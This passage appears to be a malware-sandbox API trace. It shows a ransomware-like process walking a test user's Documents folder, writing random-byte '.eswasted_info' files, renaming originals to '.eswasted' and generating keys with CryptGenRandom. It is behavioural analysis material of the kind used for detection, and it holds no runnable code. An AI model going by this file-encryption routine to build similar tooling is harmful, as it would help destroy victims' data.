lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0075.264] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.266] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0075.267] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0075.267] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.267] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0075.268] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0075.268] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.276] SetEndOfFile (hFile=0xfc) returned 1 [0075.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0075.278] CloseHandle (hObject=0xfc) returned 1 [0075.281] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0075.281] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0075.281] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0075.281] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.281] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZhmowFlf.csv") returned 71 [0075.372] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4ebff0 [0075.372] lstrcpyW (in: lpString1=0x4ec07e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.372] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4f0960 [0075.372] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0075.373] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4f0960 | out: pbBuffer=0x4f0960) returned 1 [0075.373] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZhmowFlf.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zhmowflf.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0075.425] WriteFile (in: hFile=0x110, lpBuffer=0x4f0960*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4f0960*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.426] SetEndOfFile (hFile=0x110) returned 1 [0075.426] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.426] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0960 | out: hHeap=0x4a0000) returned 1 [0075.426] lstrcpyW (in: lpString1=0x4ec07e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZhmowFlf.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zhmowflf.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZhmowFlf.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zhmowflf.csv.eswasted")) returned 1 [0075.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZhmowFlf.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zhmowflf.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.427] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.429] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0075.430] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0075.430] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.430] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0075.431] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0075.431] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.439] SetEndOfFile (hFile=0x110) returned 1 [0075.442] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0960 | out: hHeap=0x4a0000) returned 1 [0075.442] CloseHandle (hObject=0x110) returned 1 [0075.443] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0075.443] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0075.444] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0075.444] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZsNkbcsBEzsyWTPcfu.xls") returned 81 [0075.444] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4f6210 [0075.444] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.444] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4f0960 [0075.444] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0075.445] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4f0960 | out: pbBuffer=0x4f0960) returned 1 [0075.445] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZsNkbcsBEzsyWTPcfu.xls.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zsnkbcsbezsywtpcfu.xls.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0075.449] WriteFile (in: hFile=0x110, lpBuffer=0x4f0960*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4f0960*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.450] SetEndOfFile (hFile=0x110) returned 1 [0075.450] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.450] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0960 | out: hHeap=0x4a0000) returned 1 [0075.450] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZsNkbcsBEzsyWTPcfu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zsnkbcsbezsywtpcfu.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZsNkbcsBEzsyWTPcfu.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zsnkbcsbezsywtpcfu.xls.eswasted")) returned 1 [0075.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\ZsNkbcsBEzsyWTPcfu.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\zsnkbcsbezsywtpcfu.xls.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0075.451] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0075.454] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0075.455] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0075.455] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.455] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0075.455] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0075.455] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.464] SetEndOfFile (hFile=0x110) returned 1 [0075.466] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0960 | out: hHeap=0x4a0000) returned 1 [0075.466] CloseHandle (hObject=0x110) returned 1 [0075.467] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0075.467] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0075.468] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0075.468] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8QO5Aut6rZ.docx") returned 59 [0075.468] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x280) returned 0x4ebff0 [0075.468] lstrcpyW (in: lpString1=0x4ec066, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.468] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4f0960 [0075.468] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0075.825] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4f0960 | out: pbBuffer=0x4f0960) returned 1 [0075.825] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0075.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8QO5Aut6rZ.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qo5aut6rz.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.124] WriteFile (in: hFile=0xf8, lpBuffer=0x4f0960*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4f0960*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.125] SetEndOfFile (hFile=0xf8) returned 1 [0076.126] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.126] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0960 | out: hHeap=0x4a0000) returned 1 [0076.126] lstrcpyW (in: lpString1=0x4ec066, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8QO5Aut6rZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qo5aut6rz.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8QO5Aut6rZ.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qo5aut6rz.docx.eswasted")) returned 1 [0076.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8QO5Aut6rZ.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qo5aut6rz.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0076.126] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0076.129] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0076.129] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.129] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.130] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0076.130] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0076.130] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.138] SetEndOfFile (hFile=0xf8) returned 1 [0076.141] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.141] CloseHandle (hObject=0xf8) returned 1 [0076.143] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0076.143] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0076.144] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0076.144] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.144] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aWIvTKGg.csv") returned 56 [0076.144] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27a) returned 0x4ebff0 [0076.144] lstrcpyW (in: lpString1=0x4ec060, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.144] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.144] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0076.145] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.145] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aWIvTKGg.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\awivtkgg.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.145] WriteFile (in: hFile=0xf8, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.146] SetEndOfFile (hFile=0xf8) returned 1 [0076.146] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.146] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.146] lstrcpyW (in: lpString1=0x4ec060, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.146] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aWIvTKGg.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\awivtkgg.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aWIvTKGg.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\awivtkgg.csv.eswasted")) returned 1 [0076.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aWIvTKGg.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\awivtkgg.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0076.147] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0076.149] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0076.150] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.150] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.150] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0076.151] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0076.151] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.159] SetEndOfFile (hFile=0xf8) returned 1 [0076.161] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.161] CloseHandle (hObject=0xf8) returned 1 [0076.163] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0076.163] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0076.164] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0076.164] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FiTS5PcAk-twH7fqN.xlsx") returned 66 [0076.164] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28e) returned 0x4ebff0 [0076.164] lstrcpyW (in: lpString1=0x4ec074, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.164] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.164] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0076.165] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.165] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FiTS5PcAk-twH7fqN.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fits5pcak-twh7fqn.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.165] WriteFile (in: hFile=0xf8, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.166] SetEndOfFile (hFile=0xf8) returned 1 [0076.166] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.166] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.166] lstrcpyW (in: lpString1=0x4ec074, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FiTS5PcAk-twH7fqN.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fits5pcak-twh7fqn.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FiTS5PcAk-twH7fqN.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fits5pcak-twh7fqn.xlsx.eswasted")) returned 1 [0076.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FiTS5PcAk-twH7fqN.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fits5pcak-twh7fqn.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0076.167] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0076.170] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0076.170] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.170] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.170] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0076.230] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0076.230] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.239] SetEndOfFile (hFile=0xf8) returned 1 [0076.241] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.241] CloseHandle (hObject=0xf8) returned 1 [0076.242] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0076.242] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0076.243] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0076.243] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.243] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HlpkTPRO.docx") returned 57 [0076.243] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27c) returned 0x4ebff0 [0076.243] lstrcpyW (in: lpString1=0x4ec062, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.243] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.243] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0076.244] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.244] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HlpkTPRO.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hlpktpro.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.245] WriteFile (in: hFile=0xf8, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.246] 